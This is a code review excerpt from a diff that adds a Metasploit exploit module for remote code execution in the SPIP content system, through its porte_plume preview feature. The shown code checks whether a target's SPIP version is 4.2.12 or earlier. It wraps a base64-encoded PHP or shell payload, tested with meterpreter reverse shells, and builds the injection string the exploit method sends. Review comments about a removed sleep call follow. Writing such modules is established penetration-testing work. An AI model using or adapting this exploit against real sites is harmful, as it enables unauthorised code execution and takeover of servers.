modules/exploits/multi/http/spip_porte_plume_previsu_rce.rb

```diff
@@ -0,0 +1,128 @@
+        'Targets' => [
+          [
+            'PHP In-Memory', {
+              'Platform' => 'php',
+              'Arch' => ARCH_PHP
+              # tested with php/meterpreter/reverse_tcp
+            }
+          ],
+          [
+            'Unix/Linux Command Shell', {
+              'Platform' => ['unix', 'linux'],
+              'Arch' => ARCH_CMD
+              # tested with cmd/linux/http/x64/meterpreter/reverse_tcp
+            }
+          ],
+          [
+            'Windows Command Shell', {
+              'Platform' => 'win',
+              'Arch' => ARCH_CMD
+              # tested with cmd/windows/http/x64/meterpreter/reverse_tcp
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'Privileged' => false,
+        'DisclosureDate' => '2024-08-16',
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+  end
+
+  def check
+    uri = normalize_uri(target_uri.path, 'spip.php')
+    res = send_request_cgi({ 'uri' => uri.to_s })
+
+    return Exploit::CheckCode::Unknown('Target is unreachable.') unless res
+    return Exploit::CheckCode::Unknown("Target responded with unexpected HTTP response code: #{res.code}") unless res.code == 200
+
+    version_string = res.get_html_document.at('head/meta[@name="generator"]/@content')&.text
+    return Exploit::CheckCode::Unknown('Unable to find the version string on the page: spip.php') unless version_string =~ /SPIP (.*)/
+
+    version = ::Regexp.last_match(1)
+
+    if version.nil? && res.headers['Composed-By'] =~ /SPIP (.*) @/
+      version = ::Regexp.last_match(1)
+    end
+
+    return Exploit::CheckCode::Unknown('Unable to determine the version of SPIP') unless version
+
+    print_status("SPIP Version detected: #{version}")
+
+    if Rex::Version.new(version) > Rex::Version.new('4.2.12')
+      return CheckCode::Safe("The detected SPIP version (#{version}) is not vulnerable.")
+    end
+
+    return CheckCode::Appears("The detected SPIP version (#{version}) is vulnerable.")
+  end
+
+  def php_exec_cmd(encoded_payload)
+    dis = '$' + Rex::Text.rand_text_alpha(rand(4..7))
+    encoded_clean_payload = Rex::Text.encode_base64(encoded_payload)
+    shell = <<-END_OF_PHP_CODE
+        #{php_preamble(disabled_varname: dis)}
+        $c = base64_decode("#{encoded_clean_payload}");
+        #{php_system_block(cmd_varname: '$c', disabled_varname: dis)}
+    END_OF_PHP_CODE
+    return framework.encoders.create('php/base64').encode(shell)
+  end
+
+  def exploit
+    print_status('Preparing to send exploit payload to the target...')
+    compacted_payload = target['Arch'] == ARCH_PHP ? framework.encoders.create('php/base64').encode(payload.encoded) : php_exec_cmd(payload.encoded)
+    payload = "[<img#{Rex::Text.rand_text_numeric(8)}>->URL`<?php #{compacted_payload} ?>`]"
+
+    Rex.sleep(0.5)
```

Comment:
Is this needed? If so, please add a comment to explain why :)

Reply:
I added this timeout because when I did some tests, without the timeout the payload didn't work all the time. I didn't investigate further than that.

Reply:
Hey, I fixed it, I removed the sleep, it was useless in the end, I think my problem was the base64 payload that had bad chars, but now it works fine.